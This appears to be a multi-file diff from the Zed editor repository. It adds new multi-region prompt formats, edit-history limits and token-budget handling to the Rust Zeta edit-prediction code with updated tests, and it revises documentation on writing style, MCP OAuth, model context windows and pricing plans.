+ ZetaFormat::V0318SeedMultiRegions => {
+ prompt.push_str(&build_v0318_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ ZetaFormat::V0317SeedMultiRegions => {
+ prompt.push_str(&build_v0317_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ }
+}
+
+fn build_v0306_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+ section.push_str(seed_coder::START_MARKER);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
+ }
+ section.push_str(seed_coder::SEPARATOR);
+ section
+}
+
+fn build_v0316_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers_v0316(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
+ }
+ section
+}
+
+fn build_v0318_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers_v0318(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
}
+ section
+}
+
+fn build_v0317_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers_v0317(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
+ }
+ section
}
fn offset_range_to_row_range(text: &str, range: Range<usize>) -> Range<u32> {
@@ -360,7 +578,7 @@ pub fn format_prompt_with_budget_for_format(
input: &ZetaPromptInput,
format: ZetaFormat,
max_tokens: usize,
-) -> String {
+) -> Option<String> {
let (context, editable_range, context_range, cursor_offset) =
resolve_cursor_region(input, format);
let path = &*input.cursor_path;
@@ -380,16 +598,31 @@ pub fn format_prompt_with_budget_for_format(
input_related_files
};
- match format {
- ZetaFormat::V0211SeedCoder | ZetaFormat::V0304SeedNoEdits => {
- seed_coder::format_prompt_with_budget(
+ let prompt = match format {
+ ZetaFormat::V0211SeedCoder
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => {
+ let mut cursor_section = String::new();
+ write_cursor_excerpt_section_for_format(
+ format,
+ &mut cursor_section,
path,
context,
&editable_range,
cursor_offset,
+ );
+
+ let budget_with_margin = apply_prompt_budget_margin(max_tokens);
+ seed_coder::assemble_fim_prompt(
+ context,
+ &editable_range,
+ &cursor_section,
&input.events,
related_files,
- max_tokens,
+ budget_with_margin,
)
}
_ => {
@@ -403,23 +636,25 @@ pub fn format_prompt_with_budget_for_format(
cursor_offset,
);
+ let mut remaining_budget = apply_prompt_budget_margin(max_tokens);
let cursor_tokens = estimate_tokens(cursor_section.len());
- let budget_after_cursor = max_tokens.saturating_sub(cursor_tokens);
+ remaining_budget = remaining_budget.saturating_sub(cursor_tokens);
let edit_history_section = format_edit_history_within_budget(
&input.events,
"<|file_sep|>",
"edit history",
- budget_after_cursor,
+ remaining_budget,
+ max_edit_event_count_for_format(&format),
);
let edit_history_tokens = estimate_tokens(edit_history_section.len());
- let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens);
+ remaining_budget = remaining_budget.saturating_sub(edit_history_tokens);
let related_files_section = format_related_files_within_budget(
&related_files,
"<|file_sep|>",
"",
- budget_after_edit_history,
+ remaining_budget,
);
let mut prompt = String::new();
@@ -428,7 +663,12 @@ pub fn format_prompt_with_budget_for_format(
prompt.push_str(&cursor_section);
prompt
}
+ };
+ let prompt_tokens = estimate_tokens(prompt.len());
+ if prompt_tokens > max_tokens {
+ return None;
}
+ return Some(prompt);
}
pub fn filter_redundant_excerpts(
@@ -448,6 +688,25 @@ pub fn filter_redundant_excerpts(
related_files
}
+pub fn max_edit_event_count_for_format(format: &ZetaFormat) -> usize {
+ match format {
+ ZetaFormat::V0112MiddleAtEnd
+ | ZetaFormat::V0113Ordered
+ | ZetaFormat::V0114180EditableRegion
+ | ZetaFormat::V0120GitMergeMarkers
+ | ZetaFormat::V0131GitMergeMarkersPrefix
+ | ZetaFormat::V0211Prefill
+ | ZetaFormat::V0211SeedCoder
+ | ZetaFormat::v0226Hashline
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0304VariableEdit
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => 6,
+ }
+}
+
pub fn get_prefill_for_format(
format: ZetaFormat,
context: &str,
@@ -463,7 +722,11 @@ pub fn get_prefill_for_format(
| ZetaFormat::V0211SeedCoder
| ZetaFormat::v0226Hashline
| ZetaFormat::V0304VariableEdit => String::new(),
- ZetaFormat::V0304SeedNoEdits => String::new(),
+ ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => String::new(),
}
}
@@ -472,7 +735,12 @@ pub fn output_end_marker_for_format(format: ZetaFormat) -> Option<&'static str>
ZetaFormat::V0120GitMergeMarkers => Some(v0120_git_merge_markers::END_MARKER),
ZetaFormat::V0131GitMergeMarkersPrefix => Some(v0131_git_merge_markers_prefix::END_MARKER),
ZetaFormat::V0211Prefill => Some(v0131_git_merge_markers_prefix::END_MARKER),
- ZetaFormat::V0211SeedCoder | ZetaFormat::V0304SeedNoEdits => Some(seed_coder::END_MARKER),
+ ZetaFormat::V0211SeedCoder
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions => Some(seed_coder::END_MARKER),
+ ZetaFormat::V0316SeedMultiRegions => Some(multi_region::V0316_END_MARKER),
+ ZetaFormat::V0318SeedMultiRegions => Some(multi_region::V0318_END_MARKER),
+ ZetaFormat::V0317SeedMultiRegions => Some(multi_region::V0317_END_MARKER),
ZetaFormat::V0112MiddleAtEnd
| ZetaFormat::V0113Ordered
| ZetaFormat::V0114180EditableRegion
@@ -497,7 +765,52 @@ pub fn encode_patch_as_output_for_format(
cursor_offset,
)
.map(Some),
- ZetaFormat::V0304SeedNoEdits => Ok(seed_coder::no_edits(patch)),
+ ZetaFormat::V0304SeedNoEdits | ZetaFormat::V0306SeedMultiRegions => {
+ Ok(seed_coder::no_edits(patch))
+ }
+ ZetaFormat::V0316SeedMultiRegions => {
+ let empty_patch = patch.lines().count() <= 3;
+ if empty_patch {
+ let marker_offsets = multi_region::compute_marker_offsets(old_editable_region);
+ let marker_num =
+ multi_region::nearest_marker_number(cursor_offset, &marker_offsets);
+ let tag = multi_region::marker_tag(marker_num);
+ Ok(Some(format!(
+ "{tag}{tag}{}",
+ multi_region::V0316_END_MARKER
+ )))
+ } else {
+ Ok(None)
+ }
+ }
+ ZetaFormat::V0318SeedMultiRegions => {
+ let empty_patch = patch.lines().count() <= 3;
+ if empty_patch {
+ let marker_offsets =
+ multi_region::compute_marker_offsets_v0318(old_editable_region);
+ let marker_num =
+ multi_region::nearest_marker_number(cursor_offset, &marker_offsets);
+ let tag = multi_region::marker_tag(marker_num);
+ Ok(Some(format!(
+ "{tag}{tag}{}",
+ multi_region::V0318_END_MARKER
+ )))
+ } else {
+ Ok(None)
+ }
+ }
+ ZetaFormat::V0317SeedMultiRegions => {
+ let empty_patch = patch.lines().count() <= 3;
+ if empty_patch {
+ let tag = multi_region::marker_tag_relative(0);
+ Ok(Some(format!(
+ "{tag}{tag}{}",
+ multi_region::V0317_END_MARKER
+ )))
+ } else {
+ Ok(None)
+ }
+ }
_ => Ok(None),
}
}
@@ -520,10 +833,11 @@ pub fn parse_zeta2_model_output(
None => output,
};
- let (context, editable_range_in_context, context_range, _) =
+ let (context, editable_range_in_context, context_range, cursor_offset) =
resolve_cursor_region(prompt_inputs, format);
let context_start = context_range.start;
let old_editable_region = &context[editable_range_in_context.clone()];
+ let cursor_offset_in_editable = cursor_offset.saturating_sub(editable_range_in_context.start);
let (range_in_context, output) = match format {
ZetaFormat::v0226Hashline => (
@@ -543,6 +857,30 @@ pub fn parse_zeta2_model_output(
output.to_string()
},
),
+ ZetaFormat::V0306SeedMultiRegions => (
+ editable_range_in_context,
+ if output.starts_with(seed_coder::NO_EDITS) {
+ old_editable_region.to_string()
+ } else {
+ multi_region::apply_marker_span(old_editable_region, output)?
+ },
+ ),
+ ZetaFormat::V0316SeedMultiRegions => (
+ editable_range_in_context,
+ multi_region::apply_marker_span_v0316(old_editable_region, output)?,
+ ),
+ ZetaFormat::V0318SeedMultiRegions => (
+ editable_range_in_context,
+ multi_region::apply_marker_span_v0318(old_editable_region, output)?,
+ ),
+ ZetaFormat::V0317SeedMultiRegions => (
+ editable_range_in_context,
+ multi_region::apply_marker_span_v0317(
+ old_editable_region,
+ output,
+ Some(cursor_offset_in_editable),
+ )?,
+ ),
_ => (editable_range_in_context, output.to_string()),
};
@@ -602,6 +940,7 @@ fn format_edit_history_within_budget(
file_marker: &str,
edit_history_name: &str,
max_tokens: usize,
+ max_edit_event_count: usize,
) -> String {
let header = format!("{}{}\n", file_marker, edit_history_name);
let header_tokens = estimate_tokens(header.len());
@@ -612,7 +951,7 @@ fn format_edit_history_within_budget(
let mut event_strings: Vec<String> = Vec::new();
let mut total_tokens = header_tokens;
- for event in events.iter().rev() {
+ for event in events.iter().rev().take(max_edit_event_count) {
let mut event_str = String::new();
write_event(&mut event_str, event);
let event_tokens = estimate_tokens(event_str.len());
@@ -2155,21 +2494,21 @@ pub mod hashline {
Case {
name: "insert_before_first_and_after_line",
original: indoc! {"
- a
- b
- "},
+ a
+ b
+ "},
model_output: indoc! {"
- <|insert|>
- HEAD
- <|insert|>0:61
- MID
- "},
+ <|insert|>
+ HEAD
+ <|insert|>0:61
+ MID
+ "},
expected: indoc! {"
- HEAD
- a
- MID
- b
- "},
+ HEAD
+ a
+ MID
+ b
+ "},
},
];
@@ -2587,12 +2926,30 @@ pub mod seed_coder {
related_files: &[RelatedFile],
max_tokens: usize,
) -> String {
- let suffix_section = build_suffix_section(context, editable_range);
let cursor_prefix_section =
build_cursor_prefix_section(path, context, editable_range, cursor_offset);
+ assemble_fim_prompt(
+ context,
+ editable_range,
+ &cursor_prefix_section,
+ events,
+ related_files,
+ max_tokens,
+ )
+ }
- let suffix_tokens = estimate_tokens(suffix_section.len());
- let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len());
+ pub fn assemble_fim_prompt(
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_prefix_section: &str,
+ events: &[Arc<Event>],
+ related_files: &[RelatedFile],
+ max_tokens: usize,
+ ) -> String {
+ let suffix_section = build_suffix_section(context, editable_range);
+
+ let suffix_tokens = estimate_tokens(suffix_section.len() + FIM_PREFIX.len());
+ let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len() + FIM_MIDDLE.len());
let budget_after_cursor = max_tokens.saturating_sub(suffix_tokens + cursor_prefix_tokens);
let edit_history_section = super::format_edit_history_within_budget(
@@ -2600,9 +2957,11 @@ pub mod seed_coder {
FILE_MARKER,
"edit_history",
budget_after_cursor,
+ max_edit_event_count_for_format(&ZetaFormat::V0211SeedCoder),
);
- let edit_history_tokens = estimate_tokens(edit_history_section.len());
- let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens);
+ let edit_history_tokens = estimate_tokens(edit_history_section.len() + "\n".len());
+ let budget_after_edit_history =
+ budget_after_cursor.saturating_sub(edit_history_tokens + "\n".len());
let related_files_section = super::format_related_files_within_budget(
related_files,
@@ -2622,8 +2981,9 @@ pub mod seed_coder {
if !edit_history_section.is_empty() {
prompt.push('\n');
}
- prompt.push_str(&cursor_prefix_section);
+ prompt.push_str(cursor_prefix_section);
prompt.push_str(FIM_MIDDLE);
+
prompt
}
@@ -3726,7 +4086,13 @@ pub mod zeta1 {
/// Formats events in zeta1 style (oldest first).
fn format_zeta1_events(events: &[Arc<Event>]) -> String {
let mut result = String::new();
- for event in events {
+ for event in
+ events
+ .iter()
+ .skip(events.len().saturating_sub(max_edit_event_count_for_format(
+ &ZetaFormat::V0114180EditableRegion,
+ )))
+ {
let event_string = format_zeta1_event(event);
if event_string.is_empty() {
continue;
@@ -3964,10 +4330,14 @@ mod tests {
}
}
- fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String {
+ fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> Option<String> {
format_prompt_with_budget_for_format(input, ZetaFormat::V0114180EditableRegion, max_tokens)
}
+ fn budget_with_margin(requested_tokens: usize) -> usize {
+ ((requested_tokens as f64) / 0.9).ceil() as usize
+ }
+
#[test]
fn test_no_truncation_when_within_budget() {
let input = make_input(
@@ -3979,7 +4349,7 @@ mod tests {
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>related.rs
fn helper() {}
@@ -3998,6 +4368,7 @@ mod tests {
suffix
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4009,18 +4380,18 @@ mod tests {
2,
vec![make_event("a.rs", "-x\n+y\n")],
vec![
- make_related_file("r1.rs", "a\n"),
- make_related_file("r2.rs", "b\n"),
+ make_related_file("r1.rs", "aaaaaaa\n"),
+ make_related_file("r2.rs", "bbbbbbb\n"),
],
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>r1.rs
- a
+ aaaaaaa
<|file_sep|>r2.rs
- b
+ bbbbbbb
<|file_sep|>edit history
--- a/a.rs
+++ b/a.rs
@@ -4033,15 +4404,18 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
assert_eq!(
- format_with_budget(&input, 50),
- indoc! {r#"
- <|file_sep|>r1.rs
- a
- <|file_sep|>r2.rs
- b
+ format_with_budget(&input, budget_with_margin(55)),
+ Some(
+ indoc! {r#"
+ <|file_sep|>edit history
+ --- a/a.rs
+ +++ b/a.rs
+ -x
+ +y
<|file_sep|>test.rs
<|fim_prefix|>
<|fim_middle|>current
@@ -4049,6 +4423,8 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
+ )
);
}
@@ -4084,7 +4460,7 @@ mod tests {
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>big.rs
first excerpt
@@ -4099,10 +4475,11 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
assert_eq!(
- format_with_budget(&input, 50),
+ format_with_budget(&input, budget_with_margin(50)).unwrap(),
indoc! {r#"
<|file_sep|>big.rs
first excerpt
@@ -4114,6 +4491,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4152,7 +4530,7 @@ mod tests {
// With large budget, both files included; rendered in stable lexicographic order.
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>file_a.rs
low priority content
@@ -4165,6 +4543,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
// With tight budget, only file_b (lower order) fits.
@@ -4172,7 +4551,7 @@ mod tests {
// file_b header (7) + excerpt (7) = 14 tokens, which fits.
// file_a would need another 14 tokens, which doesn't fit.
assert_eq!(
- format_with_budget(&input, 52),
+ format_with_budget(&input, budget_with_margin(52)).unwrap(),
indoc! {r#"
<|file_sep|>file_b.rs
high priority content
@@ -4183,6 +4562,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4224,7 +4604,7 @@ mod tests {
// With large budget, all three excerpts included.
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>mod.rs
mod header
@@ -4239,11 +4619,12 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
// With tight budget, only order<=1 excerpts included (header + important fn).
assert_eq!(
- format_with_budget(&input, 55),
+ format_with_budget(&input, budget_with_margin(55)).unwrap(),
indoc! {r#"
<|file_sep|>mod.rs
mod header
@@ -4257,6 +4638,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4271,7 +4653,7 @@ mod tests {
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>edit history
--- a/old.rs
@@ -4287,10 +4669,11 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
assert_eq!(
- format_with_budget(&input, 55),
+ format_with_budget(&input, 60).unwrap(),
indoc! {r#"
<|file_sep|>edit history
--- a/new.rs
@@ -4303,6 +4686,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4316,25 +4700,19 @@ mod tests {
vec![make_related_file("related.rs", "helper\n")],
);
- assert_eq!(
- format_with_budget(&input, 30),
- indoc! {r#"
- <|file_sep|>test.rs
- <|fim_prefix|>
- <|fim_middle|>current
- fn <|user_cursor|>main() {}
- <|fim_suffix|>
- <|fim_middle|>updated
- "#}
- );
+ assert!(format_with_budget(&input, 30).is_none())
}
+ #[track_caller]
fn format_seed_coder(input: &ZetaPromptInput) -> String {
format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, 10000)
+ .expect("seed coder prompt formatting should succeed")
}
+ #[track_caller]
fn format_seed_coder_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String {
format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, max_tokens)
+ .expect("seed coder prompt formatting should succeed")
}
#[test]
@@ -4370,6 +4748,34 @@ mod tests {
);
}
+ #[test]
+ fn test_v0317_formats_prompt_with_many_related_files() {
+ let related_files = (0..900)
+ .map(|index| {
+ make_related_file(
+ &format!("related_{index}.rs"),
+ "fn helper() {\n let value = 1;\n}\n",
+ )
+ })
+ .collect();
+
+ let input = make_input(
+ "code",
+ 0..4,
+ 2,
+ vec![make_event("a.rs", "-x\n+y\n")],
+ related_files,
+ );
+
+ let prompt =
+ format_prompt_with_budget_for_format(&input, ZetaFormat::V0317SeedMultiRegions, 4096);
+
+ assert!(prompt.is_some());
+ let prompt = prompt.expect("v0317 should produce a prompt under high related-file count");
+ assert!(prompt.contains("test.rs"));
+ assert!(prompt.contains(CURSOR_MARKER));
+ }
+
#[test]
fn test_seed_coder_no_context() {
let input = make_input("before\nmiddle\nafter", 7..13, 10, vec![], vec![]);
@@ -4419,17 +4825,22 @@ mod tests {
<[fim-middle]>"#}
);
- // With tight budget, context is dropped but cursor section remains
assert_eq!(
- format_seed_coder_with_budget(&input, 30),
+ format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 24),
+ None
+ );
+
+ assert_eq!(
+ format_seed_coder_with_budget(&input, 40),
indoc! {r#"
<[fim-suffix]>
<[fim-prefix]><filename>test.rs
<<<<<<< CURRENT
co<|user_cursor|>de
=======
- <[fim-middle]>"#}
- );
+ <[fim-middle]>"#
+ }
+ )
}
#[test]
@@ -4480,21 +4891,20 @@ mod tests {
<[fim-middle]>"#}
);
- // With tight budget, only high_prio included.
- // Cursor sections cost 25 tokens, so budget 44 leaves 19 for related files.
- // high_prio header (7) + excerpt (3) = 10, fits. low_prio would add 10 more = 20 > 19.
+ // With tight budget under the generic heuristic, context is dropped but the
+ // minimal cursor section still fits.
assert_eq!(
- format_seed_coder_with_budget(&input, 44),
- indoc! {r#"
- <[fim-suffix]>
- <[fim-prefix]><filename>high_prio.rs
- high prio
-
- <filename>test.rs
- <<<<<<< CURRENT
- co<|user_cursor|>de
- =======
- <[fim-middle]>"#}
+ format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 44),
+ Some(
+ indoc! {r#"
+ <[fim-suffix]>
+ <[fim-prefix]><filename>test.rs
+ <<<<<<< CURRENT
+ co<|user_cursor|>de
+ =======
+ <[fim-middle]>"#}
+ .to_string()
+ )
);
}
@@ -4683,6 +5093,87 @@ mod tests {
);
}
+ #[test]
+ fn test_max_event_count() {
+ fn make_numbered_event(index: usize) -> Event {
+ return make_event(
+ &format!("event-{index}.rs"),
+ &format!("-old-{index}\n+new-{index}\n"),
+ );
+ }
+ let input = make_input(
+ "x",
+ 0..1,
+ 0,
+ (0..3).map(make_numbered_event).collect(),
+ vec![],
+ );
+
+ let edit_history_section = format_edit_history_within_budget(
+ &input.events,
+ "<|file_sep|>",
+ "edit history",
+ usize::MAX,
+ 5,
+ );
+
+ assert_eq!(
+ &edit_history_section,
+ indoc!(
+ "
+ <|file_sep|>edit history
+ --- a/event-0.rs
+ +++ b/event-0.rs
+ -old-0
+ +new-0
+ --- a/event-1.rs
+ +++ b/event-1.rs
+ -old-1
+ +new-1
+ --- a/event-2.rs
+ +++ b/event-2.rs
+ -old-2
+ +new-2
+ "
+ )
+ );
+
+ let edit_history_section = format_edit_history_within_budget(
+ &input.events,
+ "<|file_sep|>",
+ "edit history",
+ usize::MAX,
+ 2,
+ );
+
+ assert_eq!(
+ &edit_history_section,
+ indoc!(
+ "
+ <|file_sep|>edit history
+ --- a/event-1.rs
+ +++ b/event-1.rs
+ -old-1
+ +new-1
+ --- a/event-2.rs
+ +++ b/event-2.rs
+ -old-2
+ +new-2
+ "
+ )
+ );
+
+ let edit_history_section = format_edit_history_within_budget(
+ &input.events,
+ "<|file_sep|>",
+ "edit history",
+ usize::MAX,
+ 0,
+ );
+
+ assert_eq!(&edit_history_section, "");
+ }
+
#[test]
fn test_clean_zeta1_model_output_basic() {
let output = indoc! {"
@@ -126,6 +126,59 @@ Images are hosted externally. Reference format:
- With anchors: `[Custom Models](./llm-providers.md#anthropic-custom-models)`
- Parent directory: `[Telemetry](../telemetry.md)`
+## Voice and Tone
+
+### Core Principles
+
+- **Practical over promotional**: Focus on what users can do, not on selling Zed. Avoid marketing language like "powerful," "revolutionary," or "best-in-class."
+- **Honest about limitations**: When Zed lacks a feature or doesn't match another tool's depth, say so directly. Pair limitations with workarounds or alternative workflows.
+- **Direct and concise**: Use short sentences. Get to the point. Developers are scanning, not reading novels.
+- **Second person**: Address the reader as "you." Avoid "the user" or "one."
+- **Present tense**: "Zed opens the file" not "Zed will open the file."
+
+### What to Avoid
+
+- Superlatives without substance ("incredibly fast," "seamlessly integrated")
+- Hedging language ("simply," "just," "easily")—if something is simple, the instructions will show it
+- Apologetic tone for missing features—state the limitation and move on
+- Comparisons that disparage other tools—be factual, not competitive
+- Overuse of em or en dashes.
+
+## Examples of Good Copy
+
+### Good: Direct and actionable
+
+```
+To format on save, open the Settings Editor (`Cmd+,`) and search for `format_on_save`. Set it to `on`.
+
+Or add this to your settings.json:
+{
+ "format_on_save": "on"
+}
+```
+
+### Bad: Wordy and promotional
+
+```
+Zed provides a powerful and seamless formatting experience. Simply navigate to the settings and you'll find the format_on_save option which enables Zed's incredible auto-formatting capabilities.
+```
+
+### Good: Honest about limitations
+
+```
+Zed doesn't index your project like IntelliJ does. You open a folder and start working immediately—no waiting. The trade-off: cross-project analysis relies on language servers, which may not go as deep.
+
+**How to adapt:**
+- Use `Cmd+Shift+F` for project-wide text search
+- Use `Cmd+O` for symbol search (powered by your language server)
+```
+
+### Bad: Defensive or dismissive
+
+```
+While some users might miss indexing, Zed's approach is actually better because it's faster.
+```
+
## Scope
### In-Scope Documentation
@@ -204,13 +257,14 @@ Inherit all conventions from `docs/.rules`. Key points:
### Terminology
-| Use | Instead of |
-| --------------- | -------------------------------------- |
-| folder | directory |
-| project | workspace |
-| Settings Editor | settings UI |
-| command palette | command bar |
-| panel | sidebar (be specific: "Project Panel") |
+| Use | Instead of |
+| --------------- | --------------------------------------------------------------------- |
+| folder | directory |
+| project | workspace |
+| Settings Editor | settings UI |
+| command palette | command bar |
+| panel | tool window, sidebar (be specific: "Project Panel," "Terminal Panel") |
+| language server | LSP (spell out first use, then LSP is fine) |
## Zed-Specific Conventions
@@ -161,6 +161,7 @@
- [Debugger Extensions](./extensions/debugger-extensions.md)
- [Theme Extensions](./extensions/themes.md)
- [Icon Theme Extensions](./extensions/icon-themes.md)
+- [Snippets Extensions](./extensions/snippets.md)
- [Slash Command Extensions](./extensions/slash-commands.md)
- [Agent Server Extensions](./extensions/agent-servers.md)
- [MCP Server Extensions](./extensions/mcp-extensions.md)
@@ -182,6 +183,7 @@
# Account & Privacy
- [Authenticate](./authentication.md)
+- [Roles](./roles.md)
- [Privacy and Security](./ai/privacy-and-security.md)
- [Worktree Trust](./worktree-trust.md)
- [AI Improvement](./ai/ai-improvement.md)
@@ -9,6 +9,8 @@ Zed supports many external agents, including CLI-based ones, through the [Agent
Zed supports [Gemini CLI](https://github.com/google-gemini/gemini-cli) (the reference ACP implementation), [Claude Agent](https://platform.claude.com/docs/en/agent-sdk/overview), [Codex](https://developers.openai.com/codex), [GitHub Copilot](https://github.com/github/copilot-language-server-release), and [additional agents](#add-more-agents) you can configure.
+For Zed's built-in agent and the full list of tools it can use natively, see [Agent Tools](./tools.md).
+
> Note that Zed's interaction with external agents is strictly UI-based; the billing, legal, and terms arrangement is directly between you and the agent provider.
> Zed does not charge for use of external agents, and our [zero-data retention agreements/privacy guarantees](./ai-improvement.md) are **_only_** applicable for Zed's hosted models.
@@ -56,6 +56,9 @@ You can connect them by adding their commands directly to your settings file ([h
"remote-mcp-server": {
"url": "custom",
"headers": { "Authorization": "Bearer <token>" }
+ },
+ "remote-mcp-server-with-oauth": {
+ "url": "https://mcp.example.com/mcp"
}
}
}
@@ -64,6 +67,8 @@ You can connect them by adding their commands directly to your settings file ([h
Alternatively, you can also add a custom server by accessing the Agent Panel's Settings view (also accessible via the `agent: open settings` action).
From there, you can add it through the modal that appears when you click the "Add Custom Server" button.
+> Note: When a remote MCP server has no configured `"Authorization"` header, Zed will prompt you to authenticate yourself against the MCP server using the standard MCP OAuth flow.
+
## Using MCP Servers
### Configuration Check
@@ -83,9 +83,9 @@ A context window is the maximum span of text and code an LLM can consider at onc
| Model | Provider | Zed-Hosted Context Window |
| ----------------- | --------- | ------------------------- |
| Claude Opus 4.5 | Anthropic | 200k |
-| Claude Opus 4.6 | Anthropic | 200k |
+| Claude Opus 4.6 | Anthropic | 1M |
| Claude Sonnet 4.5 | Anthropic | 200k |
-| Claude Sonnet 4.6 | Anthropic | 200k |
+| Claude Sonnet 4.6 | Anthropic | 1M |
| Claude Haiku 4.5 | Anthropic | 200k |
| GPT-5.2 | OpenAI | 400k |
| GPT-5.2 Codex | OpenAI | 400k |
@@ -94,7 +94,7 @@ A context window is the maximum span of text and code an LLM can consider at onc
| Gemini 3.1 Pro | Google | 200k |
| Gemini 3 Flash | Google | 200k |
-> Context window limits for hosted Sonnet 4.5/4.6 and Gemini 3.1 Pro/3 Pro/Flash may increase in future releases.
+> Context window limits for hosted Gemini 3.1 Pro/3 Pro/Flash may increase in future releases.
Each Agent thread and text thread in Zed maintains its own context window.
The more prompts, attached files, and responses included in a session, the larger the context window grows.
@@ -7,9 +7,9 @@ description: Understand Zed's AI plans, token-based usage metering, spend limits
## Available Plans {#plans}
-For costs and more information on pricing, visit [Zed’s pricing page](https://zed.dev/pricing).
+For costs and more information on pricing, visit [Zed's pricing page](https://zed.dev/pricing).
-Zed works without AI features or a subscription. No [authentication](../authentication.md) required for the editor itself.
+Zed works without AI features or a subscription. No [authentication](../authentication.md) is required for the editor itself.
## Usage {#usage}
@@ -17,6 +17,8 @@ Usage of Zed's hosted models is measured on a token basis, converted to dollars
Zed Pro comes with $5 of monthly dollar credit. A trial of Zed Pro includes $20 of credit, usable for 14 days. Monthly included credit resets on your monthly billing date.
+The [Zed Student plan](https://zed.dev/education) includes $10/month in token credits. The Student plan is available free for one year to verified university students.
+
